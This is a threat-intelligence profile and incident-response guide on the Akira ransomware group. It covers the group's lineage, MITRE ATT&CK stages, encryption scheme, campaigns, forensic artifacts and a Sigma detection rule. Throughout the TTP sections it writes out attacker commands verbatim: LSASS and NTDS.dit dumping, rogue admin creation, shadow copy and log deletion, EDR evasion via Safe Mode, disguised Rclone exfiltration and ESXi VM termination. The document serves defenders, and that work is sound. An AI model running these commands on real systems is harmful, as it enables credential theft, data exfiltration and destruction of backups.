Skip to content

Threat Profile: Akira Ransomware Syndicate & DFIR Master Investigation Guide

HTS

HERMES THREAT SCORE & OPERATIONAL EXPLOITABILITY

Target: Enterprise IT Infrastructures, Windows Active Directory & VMware ESXi Hypervisors
Confidence: 99%
94 / 100
EXTREME

Measures real-world operational relevance, exploit weaponization, and active threat posture.

Dimension Breakdown
Exploitability 20 / 20
Threat Activity 20 / 20
Weaponization 15 / 20
Exposure 15 / 20
Prevalence 14 / 20
Impact 10 / 20
βš–οΈ Divergence & Operational Rationale

Rated 94 EXTREME by Hermes due to relentless high-tempo operations, zero-day edge appliance weaponization (SonicWall, Cisco), multi-platform hypervisor destruction (VMware ESXi, Nutanix AHV), kernel-level BYOVD defense evasion, and ruthless double-extortion tactics.

πŸ•ΈοΈ Connected Knowledge Graph & Provenance

Akira Ransomware SyndicateTHREAT ACTOR

Connected Nodes: 0

Akira surfaced in March 2023, rapidly filling the operational void left by the fragmentation of the Conti and Hive syndicates. Operating on an affiliate-driven Ransomware-as-a-Service model, Akira’s core developers provide the negotiation portal, multi-platform encryptors, leak site infrastructure, and automated exfiltration toolchains, while specialized affiliates execute network penetration, credential harvesting, and lateral movement.

Ransom demands range from $200,000 to over $10,000,000 USD in Monero (XMR) and Bitcoin (BTC), tailored to the victim’s estimated annual revenue extracted from financial filings during exfiltration.

Akira Ransomware Syndicate Lineage & Infrastructure:
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Conti Syndicate Fragmentation (May 2022) β”‚
β”‚ - Leaked Conti v2 Source Code β”‚
β”‚ - Shared Crypter Architectures & ChaCha20/RSA Algorithms β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚
β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Akira Emergence (March 2023 - Present) β”‚
β”‚ β”œβ”€β”€ Windows Encryptor (C++ / Multi-threaded) β”‚
β”‚ β”œβ”€β”€ Linux / VMware ESXi Encryptor (ELF64 / POSIX Threads) β”‚
β”‚ β”œβ”€β”€ "Megazord" Variant (Rust / PowerShell Loaders) β”‚
β”‚ └── Nutanix AHV Hypervisor Target Module (Late 2025/2026) β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β–Ό β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Retro 1980s Terminal Portal β”‚ β”‚ Double-Extortion Leak Repository β”‚
β”‚ - Unique Victim Negotiator β”‚ β”‚ - Mega.nz, Wasabi, pCloud Staging β”‚
β”‚ - Shared Crypto Wallets β”‚ β”‚ - Public Shaming & Data Auctions β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Detailed code decompilation conducted by Arctic Wolf, Sophos X-Ops, and CISA (Advisory AA24-109A) confirmed that Akira’s developers utilized the leaked Conti v2 source code base as their foundational architectural blueprint:

  1. Identical Cryptographic Wrapper Logic: Akira’s implementation of ChaCha20 key derivation, pseudo-random IV generation via CryptoAPI, and RSA key encapsulation mirrors Conti’s file-processing routines nearly byte-for-byte.
  2. String Obfuscation & API Hashing: Akira utilizes identical stack-string construction algorithms and custom hashing functions to dynamically resolve Windows APIs (VirtualAlloc, CreateFileW, CryptAcquireContextW) without populating the Import Address Table (IAT).
  3. Shared Wallet Cluster: Blockchain intelligence telemetry identified overlapping cryptocurrency wallet addresses and mixing hops between historical Conti ransom deposits and early Akira affiliate wallets.

2. Comprehensive MITRE ATT&CK Lifecycle & Deep-Dive TTPs

Section titled β€œ2. Comprehensive MITRE ATT&CK Lifecycle & Deep-Dive TTPs”

Akira intrusions display a highly disciplined, multi-stage attack lifecycle designed to achieve rapid enterprise-wide leverage before incident response teams can initiate containment:

End-to-End Akira Intrusion Kill Chain:
[1. Initial Access] ──► Exploit Cisco ASA (CVE-2023-20269) or SonicWall (CVE-2024-40766 / CVE-2026-83548)
β”‚
[2. Living-off-the-Land]──► Deploy AnyDesk / RustDesk / Ngrok; audit AD with AdFind & SharpHound
β”‚
[3. Privilege Escalation]─► Deploy POORTRY / BYOVD vulnerable drivers (zam.sys) to terminate EDR sensors
β”‚
[4. Credential Theft] ──► Dump LSASS via Mimikatz / ProcDump; extract NTDS.dit via ntdsutil
β”‚
[5. Lateral Movement] ──► Pivot via RDP (mstsc), WMI, and PsExec to Domain Controllers & ESXi hosts
β”‚
[6. Exfiltration] ──► Stage data with 7-Zip; exfiltrate via masqueraded Rclone to Mega.nz/Wasabi
β”‚
[7. Impact / Encrypt] ──► Kill VMs (esxcli/vim-cmd); delete shadows; execute ChaCha20/RSA encryptor

Akira rarely uses phishing emails with malicious macros. Instead, operators overwhelmingly exploit perimeter network devices and compromised credentials:

  • Cisco ASA / FTD Vulnerabilities: Widespread weaponization of CVE-2023-20269 (zero-day vulnerability in Cisco Adaptive Security Appliance and Firepower Threat Defense software), allowing remote attackers to conduct brute-force credential stuffing and bypass single-factor authentication on SSL-VPN portals.
  • SonicWall SSL-VPN Exploitation: Mass exploitation of CVE-2024-40766 and CVE-2026-83548 (unauthenticated remote SSRF and command injection on SonicWall SMA1000 appliances) to breach perimeter networks and harvest Active Directory LDAP bind credentials.
  • Fortinet FortiOS Exploitation: Weaponization of CVE-2026-22708 and CVE-2024-21762 (unauthenticated remote code execution on FortiOS SSL-VPN).
  • Veeam Backup & Replication Exploitation: Active targeting of CVE-2023-27532 and CVE-2024-40711 to compromise backup servers prior to lateral movement, destroying disaster recovery capabilities before deploying payloads.
  • Access Broker Credentials: Purchasing compromised enterprise VPN, Citrix, and Remote Desktop Protocol (RDP) credentials from Initial Access Brokers (IABs).

Upon establishing an internal foothold, Akira actors execute comprehensive domain and network enumeration:

  • Active Directory Auditing: Executing AdFind with scripted queries:
    Terminal window
    adfind.exe -f "(objectcategory=person)" > users.txt
    adfind.exe -f "(objectcategory=computer)" > computers.txt
    adfind.exe -f "(objectcategory=group)" > groups.txt
    adfind.exe -gcb -sc trustdmp > trust_topology.txt
  • Graph-Based BloodHound Analysis: Deploying SharpHound.exe or BloodHound.py to map shortest paths to Domain Admin accounts and sensitive Active Directory groups.
  • Network & Port Sweeping: Utilizing Advanced_IP_Scanner.exe, netscan.exe (SoftPerfect Network Scanner), and Angry IP Scanner to locate file servers, database servers, and VMware ESXi management interfaces.
  • Native LotL Reconnaissance:
    Terminal window
    net view /all /domain
    nltest /dclist:ENTERPRISE
    net group "Domain Admins" /domain
    wmic computersystem get domain,name,username

Rather than maintaining custom HTTP/DNS backdoors that trigger beaconing detections in Network Traffic Analysis (NTA) tools, Akira leverages legitimate commercial remote access software:

  • Remote Monitoring & Management (RMM):
    • AnyDesk: Installed silently via command line (AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent), configuring an unattended access password in service.conf.
    • RustDesk & Splashtop: Deployed as redundant administrative persistence mechanisms.
  • Reverse Proxy Tunneling:
    • Ngrok: Establishing outbound TCP tunnels (ngrok.exe tcp 3389) to expose internal RDP ports to the Internet without firewall port forwarding.
    • Cloudflare Tunnels (cloudflared.exe) and Chisel: Bypassing egress inspection via outbound HTTPS/WSS channels.
  • Rogue Account Generation:
    Terminal window
    net user backup_admin P@ssw0rd2026! /add
    net localgroup Administrators backup_admin /add
    net localgroup "Remote Desktop Users" backup_admin /add

Privilege Escalation & Defense Evasion (TA0004 & TA0005)

Section titled β€œPrivilege Escalation & Defense Evasion (TA0004 & TA0005)”

Akira demonstrates exceptional defense evasion sophistication, neutralizing endpoint defenses prior to encryption:

Akira affiliates utilize the POORTRY malware loader to deploy legitimately signed but vulnerable third-party kernel drivers (zam.sys - Zemana Anti-Malware, gdrv.sys - GIGABYTE, or procexp.sys - Sysinternals).

  1. The loader registers a kernel service: sc create zam_driver type= kernel binPath= C:\Windows\Temp\zam.sys.
  2. The vulnerable driver exposes arbitrary kernel memory read/write IOCTLs.
  3. POORTRY executes in ring 0, walks the EPROCESS active process linked list, and unhooks or directly terminates the user-mode processes and kernel filter drivers of leading EDR and antivirus vendors (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint, Sophos, Trend Micro).

To bypass EDR agents that resist user-mode termination, Akira configures Windows to reboot into Safe Mode with Networking:

Terminal window
bcdedit /set {current} safeboot network
shutdown /r /f /t 00

Because many third-party security agents do not register their services to start in Safe Mode (HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network), the ransomware executes with zero defensive monitoring.

Before encrypting, Akira ensures system restoration is impossible by neutralizing enterprise backup systems and Windows recovery points:

Terminal window
:: Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quiet
wmic shadowcopy delete
:: Delete Windows Backup Catalog
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup -keepVersions:0
:: Disable Windows Recovery Environment & Automatic Repair
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
:: Purge Windows Event Logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-Sysmon/Operational"

In enterprise deployments, Akira operators specifically target Veeam Backup & Replication servers (exploiting CVE-2023-27532 and CVE-2024-40711) to extract hypervisor credentials and execute mass repository wipe commands (Remove-VBRBackup -FromDisk) before deploying their Linux ESXi encryptor. For full details on this attack vector, see our dedicated analysis on Veeam Architecture & Threat Landscape.

Credential Access & Lateral Movement (TA0006 & TA0008)

Section titled β€œCredential Access & Lateral Movement (TA0006 & TA0008)”

Akira prioritizes gathering administrative credentials to enable automated payload distribution across the entire domain:

  • LSASS Memory Dumping:
    • Executing Mimikatz (privilege::debug, sekurlsa::logonpasswords).
    • Native dump via Sysinternals ProcDump: procdump.exe -ma lsass.exe C:\Windows\Temp\lsass.dmp.
    • Native API dump via comsvcs.dll:
      Terminal window
      rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full
  • Active Directory NTDS.dit Extraction:
    Terminal window
    ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\ntds_dump" q q
  • Kerberoasting & AS-REP Roasting: Utilizing Rubeus.exe to request Service Principal Name (SPN) Kerberos tickets, cracking them offline via Hashcat.
  • Lateral Traversal:
    • Remote Desktop Protocol (RDP): Establishing internal graphical sessions via mstsc.exe (Event ID 4624, Logon Type 10).
    • PsExec & WMI Execution: Distributing payloads and executing commands across endpoints:
      Terminal window
      psexec.exe \\<TARGET_IP> -u <DOMAIN>\<ADMIN_USER> -p <PASSWORD> -d -c C:\Windows\Temp\akira.exe -s 100
      wmic /node:<TARGET_IP> /user:<ADMIN_USER> /password:<PASSWORD> process call create "cmd.exe /c C:\Windows\Temp\akira.exe"

Collection & Double-Extortion Exfiltration (TA0009 & TA0010)

Section titled β€œCollection & Double-Extortion Exfiltration (TA0009 & TA0010)”

Akira strictly enforces a double-extortion protocol. File encryption is never executed until hundreds of gigabytes of proprietary documents have been exfiltrated:

  • Data Staging: Archiving sensitive directories with WinRAR or 7-Zip, frequently utilizing password protection to evade DLP scanners:
    Terminal window
    rar.exe a -hpP@ssw0rd123 -m1 -r C:\Windows\Temp\exfil_finance.rar "D:\Finance\*"
  • Exfiltration Tooling via Rclone: Akira’s primary exfiltration tool is Rclone, an open-source command-line cloud synchronization utility. Affiliates routinely disguise the Rclone executable as a native system binary:
    • Renamed paths: C:\Windows\Temp\svchost.exe, C:\ProgramData\system.exe, C:\Users\Public\taskhost.exe.
    • Executed with custom configuration files (rclone.conf) targeting cloud storage services:
      Terminal window
      svchost.exe copy "D:\CorporateData" "remote:corporate_bucket" --transfers 16 --checkers 16 --no-check-certificate --config C:\Windows\Temp\rclone.conf
    • Common destination endpoints: Mega.nz, Wasabi Cloud Storage, pCloud, and attacker-controlled SFTP servers.

Akira’s binary payloads are engineered for extreme speed and irrecoverable cryptographic strength. The syndicate maintains two primary encryptor architectures: a C++ binary targeting Windows and a specialized 64-bit ELF binary targeting VMware ESXi and Linux servers.

Akira Cryptographic Pipeline & Intermittent Encryption:
File Size Evaluation:
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Check File Size & Extension (.akira appended) β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β–Ό β–Ό β–Ό
File Size < 2 MB 2 MB <= Size <= 100 MB File Size > 100 MB
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Full Encryption β”‚ β”‚ Stepped Block Encryptionβ”‚ β”‚ Partial Header Stepping β”‚
β”‚ 100% of bytes β”‚ β”‚ Encrypt 1 block, skip N β”‚ β”‚ Encrypt 4 blocks, skip β”‚
β”‚ encrypted with β”‚ β”‚ blocks based on -n % β”‚ β”‚ remainder of gigabyte β”‚
β”‚ ChaCha20 Stream β”‚ β”‚ flag (Default: 50%) β”‚ β”‚ datastore file β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚ β”‚ β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚
β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Append Encrypted Footer to File EOF: β”‚
β”‚ 1. 256-bit ChaCha20 Key & 96-bit Nonce β”‚
β”‚ 2. Encapsulated with Affiliates' RSA-4096 Public Key β”‚
β”‚ 3. 4-byte Magic Header: 0x24 0x61 0x6B 0x69 ("$aki") β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
  • Symmetric Encryption (ChaCha20): Unlike older ransomware that relied on AES-CBC, Akira implements the ChaCha20 stream cipher. ChaCha20 provides superior encryption speed on modern multi-core processors without requiring hardware-accelerated AES-NI instruction sets. Each target file receives a uniquely generated 256-bit ChaCha20 symmetric key and a 96-bit nonce derived via CryptGenRandom.
  • Asymmetric Key Wrapping (RSA-4096): Once the file is encrypted, the unique ChaCha20 key and nonce are encrypted using an embedded RSA-4096 public key hardcoded inside the ransomware binary.
  • Footer Structure: The encrypted key block, nonce, and file metadata are appended to the very end of the file, accompanied by a 4-byte magic marker (typically 0x24 0x61 0x6B 0x69, string representation "$aki"). Without the threat actor’s RSA private key, mathematical decryption of the ChaCha20 stream is infeasible.

To outpace defensive EDR behavioral triggers that monitor high-frequency disk I/O, Akira implements an intermittent encryption algorithm controlled via command-line arguments:

  • Small Files (< 2 MB): Fully encrypted from offset 0 to EOF.
  • Medium Files (2 MB – 100 MB): Encrypts every alternate block of data based on the percentage flag -n (e.g., -n 50 encrypts 50% of the blocks, skipping intervening sections).
  • Large Files & Virtual Disks (> 100 MB): Encrypts only the beginning header and intermittent 1 MB blocks throughout the file. This corrupts file system structures (VMFS, NTFS, database headers) and renders virtual disks unusable within seconds, while encrypting only a fraction of total disk volume.

3. Command-Line Arguments Matrix (Windows & Linux/ESXi)

Section titled β€œ3. Command-Line Arguments Matrix (Windows & Linux/ESXi)”

Affiliates launch the encryptor binaries using specific operational flags:

FlagWindows SupportLinux / ESXi SupportOperational Purpose & Execution Mechanics
-p <path>YesYesSpecifies a target directory, file path, or VMFS datastore (e.g., -p /vmfs/volumes/Datastore1/).
-sNoYesStop VMs: Automatically executes esxcli and vim-cmd subroutines to terminate running virtual machines prior to encryption.
-n <percent>YesYesEncryption Ratio: Specifies the percentage of data blocks to encrypt within each file (e.g., -n 50 or -n 20).
-fork <threads>YesYesConcurrency: Spawns multi-threaded worker pools or forks child processes to parallelize encryption across CPU cores.
-share <name>YesNoTargets specific network SMB shares across the domain.

The Linux variant is an ELF64 binary compiled with GCC for x86-64 architecture. When deployed to VMware ESXi hosts via SSH or vCenter compromise:

  1. Enumeration of Virtual Machines: The binary queries the ESXi hypervisor to list all registered virtual machines:
    Terminal window
    vim-cmd vmsvc/getallvms | awk '{print $1}'
  2. Forced Process Termination: To release operating system file locks on virtual disks, the encryptor executes:
    Terminal window
    vim-cmd vmsvc/power.off <VM_ID>
    esxcli vm process kill --type=force --world-id=<WORLD_ID>
  3. Datastore Traversal & Destruction: The binary recursively walks /vmfs/volumes/ and targets specific virtualization file extensions:
    • .vmdk (Virtual Machine Disk)
    • .vmem (Virtual Machine Memory paging file)
    • .vmx / .vmxf (Virtual Machine Configuration)
    • .vmsn / .vmsd (Virtual Machine Snapshots)
    • .nvram (Virtual Machine BIOS/EFI state)
  4. Appends Extension & Drops Ransom Note: Renames target files to <filename>.akira and writes akira_readme.txt into every traversed datastore directory.

4. Real-World High-Impact Campaigns & Attack Telemetry

Section titled β€œ4. Real-World High-Impact Campaigns & Attack Telemetry”

Akira has executed several devastating enterprise disruptions globally:

  • Target: Tietoevry, a leading Nordic IT software and cloud hosting services provider based in Finland and Sweden.
  • Intrusion Vector: Exploitation of edge virtualization and perimeter network appliances.
  • Impact: Akira encrypted multiple enterprise cloud hosting clusters, knocking offline the digital services of Sweden’s national employment agency, central tax authority integrations, major hospital pharmacy chains, and over 120 municipal government portals. Recovery operations required weeks of continuous manual infrastructure rebuilding.
  • Target: Nissan Motor Corporation’s regional division in Australia and New Zealand.
  • Impact: Affiliates breached the corporate network via compromised credential stuffing on an unpatched VPN, exfiltrated over 100 gigabytes of internal corporate documents, and encrypted core file servers. Over 100,000 individuals had personal identification data, Medicare numbers, and financial details published on Akira’s Tor leak site following non-payment.

3. Mass SonicWall SSL-VPN Exploitation (2024 – 2026)

Section titled β€œ3. Mass SonicWall SSL-VPN Exploitation (2024 – 2026)”
  • Telemetry: Mandiant, Arctic Wolf, and Rapid7 documented widespread waves of Akira intrusions targeting organizations running SonicWall SMA appliances.
  • Mechanics: Attackers weaponized CVE-2024-40766 and CVE-2026-83548 to achieve unauthenticated internal access, immediately deploying Rclone and executing Akira’s Windows payload domain-wide within an average dwell time of under 36 hours.

When responding to an active Akira ransomware intrusion, investigators must execute a rigorous, prioritized triage workflow:

  1. Immediate Containment & Perimeter Severing:

    • Disconnect all external VPN interfaces (SonicWall, Cisco, Fortinet).
    • Sever external Internet egress on corporate firewalls to halt ongoing Rclone exfiltration.
    • Disconnect network interfaces on VMware ESXi hosts and vCenter servers to prevent hypervisor-level encryption.
    • Force an immediate double KRBTGT password reset across Active Directory to invalidate all forged Kerberos tickets.
  2. Volatile Memory Acquisition (Crucial Cryptographic Window):

    • Do NOT immediately reboot or power down encrypted machines.
    • If an endpoint is actively encrypting, dump volatile RAM using WinPmem, DumpIt, or hypervisor snapshot memory capture. Because ChaCha20 generates subkeys in memory, active RAM dumps may allow cryptographic recovery before processes terminate.
  3. Perimeter Authentication & Ingress Forensics:

    • Collect and parse SSL-VPN logs from Cisco ASA (%ASA-6-113019), SonicWall, and Fortinet gateways.
    • Search for anomalous source IPs, single-factor authentication sessions, and impossible travel velocity anomalies.
  4. Forensic Hunting Across Endpoint Artifacts:

  5. VMware ESXi Hypervisor Investigation:

    • Authenticate directly via local ESXi console. Review /var/log/shell.log and /var/log/auth.log for unauthorized SSH sessions.
    • Check /var/log/vmkernel.log for forced VM process kill events (esxcli vm process kill).
Artifact LocationOperating System SourceForensic Relevance in Akira Investigations
C:\Windows\Prefetch\*.pfWindows Memory ManagerProves execution timestamp, execution count, and loaded DLLs for RCLONE.EXE, ANYDESK.EXE, MIMIKATZ.EXE, and AKIRA.EXE.
C:\Windows\appcompat\Programs\Amcache.hveApplication CompatibilityRecords SHA-1 file hashes, compilation timestamps, and full file paths of staging and exfiltration tools.
SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCacheWindows Registry (Shimcache)Confirms existence and execution path of transient attacker scripts even if files were deleted from disk.
C:\Windows\System32\sru\SRUDB.datSRUM DatabaseExfiltration Proof: Quantifies exact network bytes transferred per application interface, proving whether masqueraded svchost.exe exfiltrated gigabytes of data.
C:\Users\<USER>\AppData\Roaming\AnyDesk\AnyDesk Application LogsContains connection_trace.txt and ad.trace, detailing remote attacker client IDs, session durations, and clipboard transfers.
C:\Windows\Temp\rclone.confAttacker ConfigurationContains cloud bucket names, access keys, and remote endpoints utilized for exfiltration.

Deploy the following production-grade detection engineering assets across SIEM, EDR, and network sensors:

title: Akira Ransomware Execution & Recovery Inhibition
id: 3c8e9b41-1192-4f8a-9214-akira001
status: stable
description: Detects process execution patterns indicative of Akira ransomware, including volume shadow copy deletion, recovery disabling, and common command-line flags.
author: Hermes Codex CTI
date: 2026-09-08
references:
- CISA Advisory AA24-109A
- https://hermes-codex.internal/threat-intel/akira-ransomware/
tags:
- attack.impact
- attack.t1486
- attack.t1490
- attack.defense_evasion
- attack.t1070.001
logsource:
category: process_creation
product: windows
detection:
selection_shadows:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_wmic:
CommandLine|contains|all:
- 'wmic'
- 'shadowcopy'
- 'delete'
selection_bcdedit:
CommandLine|contains|all:
- 'bcdedit'
- 'bootstatuspolicy'
- 'ignoreallfailures'
selection_akira_flags:
CommandLine|contains:
- ' -n '
- ' -s '
- ' -fork '
- ' -share '
selection_wevtutil:
CommandLine|contains|all:
- 'wevtutil'
- 'cl'
- 'Security'
condition: 1 of selection_*
falsepositives:
- Highly unusual legitimate administrative disaster recovery testing (verify user context and change ticket).
level: critical

7. Cross-Linking: Threat Ecosystem & Investigation Matrix

Section titled β€œ7. Cross-Linking: Threat Ecosystem & Investigation Matrix”

To conduct an end-to-end investigation into an Akira intrusion, analysts must cross-reference related Hermes Codex threat intelligence profiles, forensic artifacts, and operational playbooks:

Investigation DimensionCodex Dossier / ToolOperational Focus & DFIR Synergies
Incident Response PlaybookRansomware Investigation PlaybookStep-by-step master DFIR methodology for containment, memory acquisition, and host rebuilding.
Lateral Movement AnalysisLateral Movement: SMB vs RDPForensics on network pivot mechanics, Event 4624 Logon Type 10 vs Type 3, and PsExec tracking.
Credential ForensicsActive Directory Credential AttacksInvestigating LSASS dumps, Kerberoasting, and NTDS.dit extraction artifacts.
Perimeter VulnerabilityCVE-2026-83548: SonicWall SMA1000 SSRFTechnical root cause and exploit chain for the primary perimeter gateway compromised by Akira affiliates.
Perimeter VulnerabilityCVE-2026-22708: Fortinet FortiOS RCEExploit mechanics of FortiOS perimeter zero-days leveraged for initial corporate entry.
Threat Actor ProfileInitial Access Brokers (IAB)Understanding the underground marketplace where Akira affiliates purchase pre-compromised VPN credentials.
Backup DecapitationVeeam Architecture & Threat LandscapeDetailed breakdown of Akira’s weaponization of Veeam vulnerabilities and backup wiping procedures.
Peer Syndicate ComparisonQilin RansomwareComparative analysis with Qilin, another high-impact syndicate actively targeting enterprise hypervisors.
Interactive Defense ToolAgentThreat StudioModel enterprise perimeter boundaries and untrusted ingress channels in threat simulation architectures.